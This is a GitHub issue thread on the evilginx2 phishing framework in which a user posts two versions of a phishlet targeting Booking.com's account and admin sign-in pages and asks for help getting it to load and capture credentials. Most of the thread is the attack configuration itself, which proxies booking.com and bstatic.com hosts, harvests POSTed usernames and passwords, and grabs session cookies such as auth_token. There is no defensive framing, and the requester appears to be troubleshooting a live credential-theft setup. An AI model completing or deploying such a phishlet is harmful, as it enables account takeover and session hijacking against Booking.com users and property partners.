### ISSUE TITLE
booking.yaml

### ISSUE THREAD

**Issue by siddallj84** [kgretzky/evilginx2#174]
author: '@customsync'
min_ver: '2.3.0'
proxy_hosts:
  - {phish_sub: 'www', orig_sub: 'account', domain: 'booking.com', session: true, is_landing: true}
  - {phish_sub: 'saa', orig_sub: 'saa', domain: 'booking.com', session: false, is_landing: false}
  - {phish_sub: 'q', orig_sub: 'q', domain: 'bstatic.com', session: false, is_landing: false}
sub_filters:
  - {triggers_on: 'account.booking.com', orig_sub: 'www', domain: 'booking.com', search: 'action="https://{hostname}', replace: 'action="https://{hostname}', mimes: ['text/html', 'application/json']}
  - {triggers_on: 'account.booking.com', orig_sub: 'www', domain: 'booking.com', search: 'href="https://{hostname}', replace: 'href="https://{hostname}', mimes: ['text/html', 'application/json']}
  - {triggers_on: 'saa.booking.com', orig_sub: 'saa', domain: 'booking.com', search: 'action="https://{hostname}', replace: 'action="https://{hostname}', mimes: ['text/html', 'application/json']}
  - {triggers_on: 'saa.booking.com', orig_sub: 'saa', domain: 'booking.com', search: 'href="https://{hostname}', replace: 'href="https://{hostname}', mimes: ['text/html', 'application/json']}
  - {triggers_on: 'q.bstatic.com', orig_sub: 'q', domain: 'bstatic.com', search: 'action="https://{hostname}', replace: 'action="https://{hostname}', mimes: ['text/html', 'application/json']}
  - {triggers_on: 'q.bstatic.com', orig_sub: 'q', domain: 'bstatic.com', search: 'href="https://{hostname}', replace: 'href="https://{hostname}', mimes: ['text/html', 'application/json']}
auth_tokens:
  - domain: '.booking.com'
    keys: ['bkng_ap','secure','bkng_bfp','ecc','auth_token','liteha']
credentials:
  username:
    key: 'loginname'
    search: '(.*)'
    type: 'post'
  password:
    key: 'password'
    search: '(.*)'
    type: 'post'
login:
  domain: 'account.booking.com'
path: '/sign-in?op_token=EgVvYXV0aCJSChQ2Wjcyb0hPZDM2Tm43emszcGlyaBIJYXV0aG9yaXplGhpodHRwczovL2FkbWluLmJvb2tpbmcuY29tLyoNeyJwYWdlIjpudWxsfUIEY29kZSoIMJOij7KFmiM'

[11:22:03] [err] failed to load phishlet 'booking.yaml': login: missing `path` field
why did wrong here ? please help

**Comment by kgretzky** [comment]
Can you embed the phishlet in code tags? In YAML format identation is very important and with such paste, it is lost.

**Comment by siddallj84** [comment]
```
author: '@white_fi'
min_ver: '2.3.0'
proxy_hosts:
  - {phish_sub: 'www', orig_sub: 'admin', domain: 'booking.com', session: true, is_landing: true}
  - {phish_sub: '', orig_sub: '', domain: 'booking.com', session: true, is_landing: false}
  - {phish_sub: 'q', orig_sub: 'q', domain: 'bstatic.com', session: true, is_landing: false}
  - {phish_sub: 'r', orig_sub: 'r', domain: 'bstatic.com', session: true, is_landing: false}
sub_filters:
  - {triggers_on: 'admin.booking.com', orig_sub: 'www', domain: 'booking.com', search: 'action="https://{hostname}', replace: 'action="https://{hostname}', mimes: ['text/html', 'application/json']}
  - {triggers_on: 'admin.booking.com', orig_sub: 'www', domain: 'booking.com', search: 'href="https://{hostname}', replace: 'href="https://{hostname}', mimes: ['text/html', 'application/json']}
  - {triggers_on: 'q.bstatic.com', orig_sub: 'q', domain: 'bstatic.com', search: 'action="https://{hostname}', replace: 'action="https://{hostname}', mimes: ['text/html', 'application/json']}
  - {triggers_on: 'q.bstatic.com', orig_sub: 'q', domain: 'bstatic.com', search: 'href="https://{hostname}', replace: 'href="https://{hostname}', mimes: ['text/html', 'application/json']}
  - {triggers_on: 'i.bstatic.com', orig_sub: 'i', domain: 'bstatic.com', search: 'action="https://{hostname}', replace: 'action="https://{hostname}', mimes: ['text/html', 'application/json']}
  - {triggers_on: 'i.bstatic.com', orig_sub: 'i', domain: 'bstatic.com', search: 'href="https://{hostname}', replace: 'href="https://{hostname}', mimes: ['text/html', 'application/json']}
auth_tokens:
  - domain: '.booking.com'
    keys: ['bkng_bfp','ecc','ece','auth_token','liteha']
credentials:
  username:
    key: 'loginname'
    search: '(.*)'
    type: 'post'
  password:
    key: 'password'
    search: '(.*)'
    type: 'post'
login:
  domain: 'admin.booking.com'
  path: ''

i solved problems but now dont want capturing credentials

why i did  wrong?

```
